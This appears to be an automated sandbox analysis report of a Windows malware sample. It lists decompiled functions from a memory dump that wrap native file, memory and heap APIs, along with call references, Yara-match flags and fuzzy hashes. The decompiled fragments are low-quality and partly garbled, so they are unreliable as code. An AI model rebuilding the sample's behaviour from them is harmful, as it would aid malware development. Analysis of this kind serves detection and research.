                                  				asm("aaa");
                                  				if(__eflags <= 0) {
                                  					asm("les edx, [edx+edx*2]");
                                  					_t6 =  &_a12; // 0x413d72
                                  					_t15 =  *((intOrPtr*)( *_t22))( *_t6, _a16, _a20, _a24, _a28, _a32, _t16, _t11 & 0x00000083); // executed
                                  					return _t15;
                                  				} else {
                                  					__ebp = __esp;
                                  					__eax = _a4;
                                  					_t8 = __eax + 0x10; // 0x300
                                  					_t9 = __eax + 0xc50; // 0x409763
                                  					__esi = _t9;
                                  					E004191E0(__edi, _a4, __esi,  *_t8, 0, 0x2c) =  *__esi;
                                  					__eax = NtClose(_a8); // executed
                                  					__esi = __esi;
                                  					__ebp = __ebp;
                                  					return __eax;
                                  				}
                                  			}











                                  APIs
                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileRead
                                  • String ID: r=A$r=A
                                  • API String ID: 752142053-687523353

                                  C-Code - Quality: 25%
                                  			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, signed char _a36, void* _a40) {
                                  				void* _v5;
                                  				signed char _t15;
                                  				void* _t19;
                                  				intOrPtr _t21;
                                  				void* _t28;
                                  				intOrPtr* _t29;
                                  
                                  				_t13 = _a4;
                                  				_t29 = _a4 + 0xc48;
                                  				E004191E0(_t28, _a4, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                  				_t15 = _a36;
                                  				_t6 =  &_a32; // 0x413d72
                                  				_t21 =  *_t6;
                                  				asm("les edx, [edx+edx*2]");
                                  				_t12 =  &_a8; // 0x413d72
                                  				_t19 =  *((intOrPtr*)( *_t29))( *_t12, _a12, _a16, _a20, _a24, _a28, _t21, _t15 & 0x00000083); // executed
                                  				return _t19;
                                  			}










                                  APIs
                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:A$r=A$r=A
                                  • API String ID: 2738559852-4243674446

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0

                                  APIs
                                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                  • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f786db786914ef59345290d3168d3a710ffcb86c38d3a753a01f2aaba0ba5233
                                  • Instruction ID: 970847535d5f0cb4f7bfd8bdf7b5a0f7e266e8390238ffc03460d079b21a00c0
                                  • Opcode Fuzzy Hash: f786db786914ef59345290d3168d3a710ffcb86c38d3a753a01f2aaba0ba5233
                                  • Instruction Fuzzy Hash: EA9002A234100442D10161E95424B160005E7E1341F51C015E1054558DC699CC527166
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 66f35f09d153f689a883c48d1d686a06ad9c633122bd86c6a759ed6e595583d7
                                  • Instruction ID: bbb4e8f8e9ef639b693f1ba533389130ba35651f342907eb13e4a6a195060d8c
                                  • Opcode Fuzzy Hash: 66f35f09d153f689a883c48d1d686a06ad9c633122bd86c6a759ed6e595583d7
                                  • Instruction Fuzzy Hash: 919002B220100402D14171E954147560005A7D0341F51C011A5054558EC6D98DD576A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0f00fa3d9b9b0431927cb1cd19135e50a84d838351a5b0e8583e99baf7685758
                                  • Instruction ID: a193822c77949feb60fbf0d32c102a243cba8543daa04fc293c093044813aa25
                                  • Opcode Fuzzy Hash: 0f00fa3d9b9b0431927cb1cd19135e50a84d838351a5b0e8583e99baf7685758
                                  • Instruction Fuzzy Hash: BE90026260100502D10271E95414626000AA7D0381F91C022A1014559ECAA58992B171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 2155c837ccb2e1f7bcf4475e88c4b2561e6db77cddc54dbfee94e050087d0e50
                                  • Instruction ID: 2d59d3fda6c11a8bcde7677993de1e78a2fb5bc37ff65be85b1738dbacb01fe1
                                  • Opcode Fuzzy Hash: 2155c837ccb2e1f7bcf4475e88c4b2561e6db77cddc54dbfee94e050087d0e50
                                  • Instruction Fuzzy Hash: E0900262242041525546B1E954145174006B7E0381791C012A1404954CC5A69856E661
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6da318af62f1a6e5c44dc51617e5dd157ae4666fd3d7511a87a9156458f0796a
                                  • Instruction ID: f0a9788d619fa499a24df8098ac71afaeefa3c75bccd05992adb4bd0ba6925ff
                                  • Opcode Fuzzy Hash: 6da318af62f1a6e5c44dc51617e5dd157ae4666fd3d7511a87a9156458f0796a
                                  • Instruction Fuzzy Hash: 0290027220100413D11261E955147170009A7D0381F91C412A041455CDD6D68952B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: fdae0a9350b2503ba8d9c2c9c9af8042ca22c6c9289d40636159ca7ffb54dd18
                                  • Instruction ID: d059d3a9b874d010c7bffe16b4285c213b135979fa70c73979159174ba7dc55a
                                  • Opcode Fuzzy Hash: fdae0a9350b2503ba8d9c2c9c9af8042ca22c6c9289d40636159ca7ffb54dd18
                                  • Instruction Fuzzy Hash: 5690027220140402D10161E9582471B0005A7D0342F51C011A1154559DC6A5885175B1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 10963662d65cb2791706a7899996d6590d6777e730e089782af7cb3eb0bcda68
                                  • Instruction ID: c0af84df1a59e0efec67f39ead18261d8b71539b255b4b66e2353e3a8f893eba
                                  • Opcode Fuzzy Hash: 10963662d65cb2791706a7899996d6590d6777e730e089782af7cb3eb0bcda68
                                  • Instruction Fuzzy Hash: 5C90026260100042414171F998549164005BBE1351751C121A0988554DC5D9886566A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5504d70c0d86ec7ae530a765cd59868bf4a8b546065e21b18b3a3b611facd371
                                  • Instruction ID: 160d37e1f21a46ee3f428e9d9b455f59ce5741f83a5a9ae2ab554c7e654ecabf
                                  • Opcode Fuzzy Hash: 5504d70c0d86ec7ae530a765cd59868bf4a8b546065e21b18b3a3b611facd371
                                  • Instruction Fuzzy Hash: 4F90026221180042D20165F95C24B170005A7D0343F51C115A0144558CC99588616561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: f07817e42e680f1aa6ca63adf5ddb3440f9d9fc1ee5d440d4652466238883930
                                  • Instruction ID: 5e2ad23d66ee111c0d317f961a063e8851710d8a8b9e5305f002ffc5b1c5a3e2
                                  • Opcode Fuzzy Hash: f07817e42e680f1aa6ca63adf5ddb3440f9d9fc1ee5d440d4652466238883930
                                  • Instruction Fuzzy Hash: DF9002A220200003410671E95424626400AA7E0341B51C021E1004594DC5A588917165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b1faf356e811347f4b3411d550d45ad485ef2097507fbf1cc1d9919e3d2e7652
                                  • Instruction ID: e45b557d10ddd9cbe4f27f5cf38aea613610caa482731e823639c53c7bc650dc
                                  • Opcode Fuzzy Hash: b1faf356e811347f4b3411d550d45ad485ef2097507fbf1cc1d9919e3d2e7652
                                  • Instruction Fuzzy Hash: 01900266211000030106A5E917145170046A7D5391351C021F1005554CD6A188616161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a8a9a71fd37e3fd417496c26d71cb9ee89f76686a6d863a8cafe412f29c0f9ae
                                  • Instruction ID: b1cc8118342dd9f9dd20194b1170f2a68d7b516c704298735b96774f442591d5
                                  • Opcode Fuzzy Hash: a8a9a71fd37e3fd417496c26d71cb9ee89f76686a6d863a8cafe412f29c0f9ae
                                  • Instruction Fuzzy Hash: 8490026A21300002D18171E9641861A0005A7D1342F91D415A000555CCC99588696361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5cdb7a3a62e764c27ef6cbf306d488d42686876c451fb8b73d55825cbea883a3
                                  • Instruction ID: bf692555ab571722d9cc26524f5b47df8381e315ccfbb5f8dd48f1663b8de558
                                  • Opcode Fuzzy Hash: 5cdb7a3a62e764c27ef6cbf306d488d42686876c451fb8b73d55825cbea883a3
                                  • Instruction Fuzzy Hash: 1F90026230100003D14171E964286164005F7E1341F51D011E0404558CD99588566262
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ed7d314ae722b4f8b2e984546cb27a68117b757a3926b7643146b2efd75066d4
                                  • Instruction ID: 4c5a03726f0b260a5aed76f14e4b2f592484cd4c8cc523fe343863f15dcf570c
                                  • Opcode Fuzzy Hash: ed7d314ae722b4f8b2e984546cb27a68117b757a3926b7643146b2efd75066d4
                                  • Instruction Fuzzy Hash: 6A90027231114402D11161E994147160005A7D1341F51C411A081455CDC6D588917162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 0d4ccaaf6d46ef1618999c91839f0bcea0ad9012ff06409872ea4e2f84bf044a
                                  • Instruction ID: d02511df6afca474226922fbdff8e567f8dd26761e8f8f986cd6dba7e59c37b6
                                  • Opcode Fuzzy Hash: 0d4ccaaf6d46ef1618999c91839f0bcea0ad9012ff06409872ea4e2f84bf044a
                                  • Instruction Fuzzy Hash: 0E90027220100402D10165E964186560005A7E0341F51D011A5014559EC6E588917171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 4336a02fb66aadeaceac2257de649381015d9f3dd295f63f88ca4185623699a4
                                  • Instruction ID: 24b9040d23bc33f9aab49720623016861f35c434f06e2c14bf23f266e97b188e
                                  • Opcode Fuzzy Hash: 4336a02fb66aadeaceac2257de649381015d9f3dd295f63f88ca4185623699a4
                                  • Instruction Fuzzy Hash: 4D90027220108802D11161E9941475A0005A7D0341F55C411A441465CDC6D588917161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 26eaf7d4da8aef81873e788b386a0bc0f716fa64cdbeab8f247e2469a15f4581
                                  • Instruction ID: 325dd1950fbc5ae879922b96933072e06ab45298e082802cb1da3f9b645edf92
                                  • Opcode Fuzzy Hash: 26eaf7d4da8aef81873e788b386a0bc0f716fa64cdbeab8f247e2469a15f4581
                                  • Instruction Fuzzy Hash: C090027220100802D18171E9541465A0005A7D1341F91C015A0015658DCA958A5977E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                  • Instruction ID: a66f789b9c9346c4209e30225a072a2b07741faaa143dbde407d40e20ce1c0b9
                                  • Opcode Fuzzy Hash: 25b9e4bfeadf490359593a5bd4afb5d1c4bb2ba5ede10faa6f148f0b6e30c1a6
                                  • Instruction Fuzzy Hash: BD21FBB2C4420957CB15E6649E42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E004188B0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                  				void* _t10;
                                  				void* _t15;
                                  
                                  				E004191E0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                  				_t6 =  &_a8; // 0x413536
                                  				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                  				return _t10;
                                  			}






                                  APIs
                                  • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID: 65A
                                  • API String ID: 1279760036-2085483392
                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction ID: 6af236cfb772a66706e6e9b9d52e602bd21d3a4cd2a65313634d6b12f98b32f7
                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                  • Instruction Fuzzy Hash: BDE012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242CA30F910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 40%
                                  			E00418923(void* __ebx, void* __ecx, int __edx, void* __eflags) {
                                  				void* __esi;
                                  				void* __ebp;
                                  				intOrPtr* _t10;
                                  				char _t13;
                                  				void* _t14;
                                  				void* _t15;
                                  				int _t17;
                                  				void* _t20;
                                  				void* _t23;
                                  
                                  				_t17 = __edx;
                                  				_t15 = __ecx;
                                  				_t14 = __ebx;
                                  				_pop(_t10);
                                  				if(__eflags > 0) {
                                  					L5:
                                  					_t8 = _t14 + 0x68b0c55;
                                  					 *_t8 =  *((intOrPtr*)(_t14 + 0x68b0c55)) + _t15;
                                  					__eflags =  *_t8;
                                  					ExitProcess(_t17);
                                  				}
                                  				__edx = __edx + 1;
                                  				__eflags = __edx;
                                  				_t4 = __ax;
                                  				__ax = __cx;
                                  				__cx = _t4;
                                  				if(__edx <= 0) {
                                  					_pop(ss);
                                  					_push(0x6d);
                                  					asm("loope 0xffffffc3");
                                  					__ebp = __esp;
                                  					__eax =  *((intOrPtr*)(__esp + 8));
                                  					__ecx =  *((intOrPtr*)(__eax + 0xa14));
                                  					__esi = __eax + 0xc7c;
                                  					__eax = E004191E0(__edi, __eax, __eax + 0xc7c,  *((intOrPtr*)(__eax + 0xa14)), 0, 0x36);
                                  					goto L5;
                                  				}
                                  				 *_t10 =  *_t10 + _t10;
                                  				_push(_t10);
                                  				E004191E0(_t20);
                                  				_t13 = RtlFreeHeap( *(_t23 + 0xc),  *(_t23 + 0x10),  *(_t23 + 0x14)); // executed
                                  				return _t13;
                                  			}













                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitFreeHeapProcess
                                  • String ID:
                                  • API String ID: 1180424539-0
                                  • Opcode ID: f4c07f08e70274fe5969a5ba238bd53d72c6937873ebf5ecc56d9da218e84072
                                  • Instruction ID: 2ca7b805f7778705d74f9d09f1563c9da4ba412d0acfcda959870e8aed924cc8
                                  • Opcode Fuzzy Hash: f4c07f08e70274fe5969a5ba238bd53d72c6937873ebf5ecc56d9da218e84072
                                  • Instruction Fuzzy Hash: 7601B1B52043057BD721DF58DC96FE77758EF84760F04409AF9485B242D930EE50CAE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitFreeHeapProcess
                                  • String ID:
                                  • API String ID: 1180424539-0
                                  • Opcode ID: b15be104c320dfa4f44ef67500cef52cc1af5f29270f7141fdfe4c962698c0c7
                                  • Instruction ID: 5bd50c8c3eb33e5b96021e555d33704aa5d1df429cc087b465dd648f0bfa85b0
                                  • Opcode Fuzzy Hash: b15be104c320dfa4f44ef67500cef52cc1af5f29270f7141fdfe4c962698c0c7
                                  • Instruction Fuzzy Hash: 87F0E2B52002147BCB15DF58CC49EE7379CEF48740F154599F9086B242C630E940CAF1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                  • Instruction ID: 93bd109d16e53c8762968f959fe3c9c023db94cb098c15d1529cbaaabdda2f39
                                  • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                  • Instruction Fuzzy Hash: F001D431A8022977E720AA959C03FFE772C5B00B55F04006EFF04BA1C2E6A8790542EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 0a07abca213fd1898abc626acc5bd91f107e72fdd67c15d3a60637870484657c
                                  • Instruction ID: a1270247ef26ae8ef761aa800b0d1d2d5b176ed9c01364dbca8af8c15f65e25b
                                  • Opcode Fuzzy Hash: 0a07abca213fd1898abc626acc5bd91f107e72fdd67c15d3a60637870484657c
                                  • Instruction Fuzzy Hash: 85E0E5752142906FCB11CB69DC45E973FA8DF45240F044599FD8857203C4349414C7B4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 0041891D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction ID: 4eb6e808868848e44fc4af0a2d328e43ee2ba6839a30e24a5e1d9ea2c08b961d
                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                  • Instruction Fuzzy Hash: 6BE012B1200209ABDB18EF99CC49EA777ACAF88750F018559FA085B242CA30E910CAB0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A80
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction ID: 6b795ac81b365ad13cf9f2a9b204a9737006b755962b409e964d21a2d06fa60d
                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                  • Instruction Fuzzy Hash: 62E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FA0857241C934E950CBF5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418958
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID:
                                  • API String ID: 621844428-0
                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction ID: c6ffa8f41277cedcd146721b33de4ab2dd662f0a832426917f21051448e796de
                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                  • Instruction Fuzzy Hash: 90D012716042147BD620DB99CC85FD7779CDF48790F018065FA1C5B241C531BA00C6E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 507835f10f86ebdd6881e70f52d66418c2c0240527aaae3c3f42fabdd21846cc
                                  • Instruction ID: 3dc618a01314889426264bb6c9ac2b859e336cf6a60cc202143a3858cca502b4
                                  • Opcode Fuzzy Hash: 507835f10f86ebdd6881e70f52d66418c2c0240527aaae3c3f42fabdd21846cc
                                  • Instruction Fuzzy Hash: D8B09B729014C5D5D612D7F556087277A047BD0745F16C055E2060645B8778C091F6B5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Strings
                                  • write to, xrefs: 01A6B4A6
                                  • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01A6B476
                                  • *** An Access Violation occurred in %ws:%s, xrefs: 01A6B48F
                                  • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01A6B323
                                  • a NULL pointer, xrefs: 01A6B4E0
                                  • *** Resource timeout (%p) in %ws:%s, xrefs: 01A6B352
                                  • Go determine why that thread has not released the critical section., xrefs: 01A6B3C5
                                  • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01A6B39B
                                  • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01A6B38F
                                  • read from, xrefs: 01A6B4AD, 01A6B4B2
                                  • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01A6B47D
                                  • an invalid address, %p, xrefs: 01A6B4CF
